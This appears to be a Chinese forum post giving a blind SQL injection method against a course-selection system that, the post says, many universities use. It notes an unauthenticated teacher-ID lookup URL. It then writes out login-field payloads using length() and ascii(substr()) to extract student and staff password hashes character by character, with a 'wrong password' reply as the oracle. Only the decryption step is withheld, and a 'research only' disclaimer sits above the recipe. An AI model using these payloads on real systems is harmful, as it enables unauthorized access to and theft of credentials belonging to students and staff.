|
今天,在邪八上看到一位仁兄写了对此系统的分析报告。他的文章重点在于如何方便的选课,在安全性方面没有涉及太多。在这里我把这个放出来吧。
-------------------------------------------------------------------
警告:本文只做技术研究!严禁用于非法用途!
转载请注明出处和作者!
----------------------------------------------------
anuiz、我菜我菜我菜菜[BCT]
------------------------
教师对应编号查询地址没有验证,直接输入地址即可查询。
(那个随机括号内的东西完全可以去掉)
首先把外面的东西对应数据库里面的字段列一下。
密码-mm
教师、部门-js
口令-kl
学生用的密码mm字段,教师和部门用的口令kl字段。
注入语句:(写在登陆框用户名处就ok)
1.首先判断要猜解用户的密码长度
学号'andlength(mm)>x--
职教号'andlength(kl)>x--</>
直接登录,返回密码错误则是猜解正确。
2.猜解每一位密码
学号'andascii(substr(mm,第几位,1))>xx--
职教号'andascii(substr(kl,第几位,1))>xx--
同样返回密码错误i则是猜解正确。
3.解密
数据库中的数据时经过加密的,算法和解密工具我就不发出来了,点到为止。希望对此有研究的各位大虾也不要放出解密工具来,毕竟这个东西很多高校正在使用,影响力还是有点大。 |
当前位置:
